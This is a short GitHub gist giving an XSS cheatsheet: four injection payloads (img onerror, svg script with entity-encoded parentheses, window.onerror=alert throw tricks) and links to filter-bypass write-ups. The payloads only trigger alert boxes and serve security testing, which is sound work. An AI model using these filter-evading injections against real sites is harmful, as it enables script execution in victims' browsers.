Skip to content

Instantly share code, notes, and snippets.

@TomTasche

TomTasche/xss-cheatsheet

Last active September 28, 2020 15:38
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 2 You must be signed in to fork a gist
  • Save TomTasche/f0e4e219f1e5c904a48414fbcd224373 to your computer and use it in GitHub Desktop.
Save TomTasche/f0e4e219f1e5c904a48414fbcd224373 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
xss-cheatsheet
depending on your specific scenario you might want to try to inject one of those:
<img onerror="window.alert('hey')" src="bla"/>
<svg><script>alert&#40/hey/.source&#41</script></svg>
<img onerror="window.onerror=alert;throw 'hey'" src="bla"/>
<script>window.onerror=alert;throw "hey";</script>
inspiration:
- http://www.thespanner.co.uk/2012/05/01/xss-technique-without-parentheses/
- https://security.stackexchange.com/a/36630/8000
- https://security.stackexchange.com/questions/71317/stored-cross-site-scripting-without-parentheses-or-spaces
- https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment